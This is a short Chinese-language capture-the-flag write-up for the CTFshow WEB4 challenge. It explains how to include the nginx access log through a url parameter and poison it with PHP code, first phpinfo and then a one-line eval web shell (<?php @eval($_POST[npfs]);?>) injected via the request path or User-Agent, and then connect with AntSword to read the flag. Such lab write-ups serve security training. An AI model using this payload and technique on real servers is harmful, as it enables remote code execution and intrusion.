靶機:CTFshow WEB4
漏洞測試
1.輸入進行測試
2.查看相應日志文件,在本題中文件日志默認地址為/var/log/nginx/access.log
(可通過抓包查看得知服務器為Ubuntu,由nginx搭建的網站,nginx的日志文件默認地址在/var/log/nginx/access.log和/var/log/nginx/error.log,其中本題中access.log可以打開)
?url=/var/log/nginx/access.log
,查看文件日志,發現剛剛get的phpinfo存在日志里,且被轉義
3.重新Get 並進行抓包
將這里的%3C?php%20phpinfo();?%3E
改成<?php phpinfo();?>
修改之后放包,再去文件包含日志文件,發現已被執行
4.由此判斷存在日志注入漏洞
法一
1.輸入一句話木馬<?php @eval($_POST[npfs]);?>
2.抓包將轉義后的<?php @eval($_POST[npfs]);?>
修改回來,放包(實際做法,如上面所述)
3.訪問日志文件,查看存在一句話木馬內容,說明一句話木馬被當作php語言正常解析
4.蟻劍連接
flag在根目錄下的www的flag.txt文件中
法二
1.url :?url=/var/log/nginx/access.log
,抓包
2.利用 user-agent 插入 payload 到日志文件
- 放包,蟻劍連接
flag在根目錄下的www的flag.txt文件中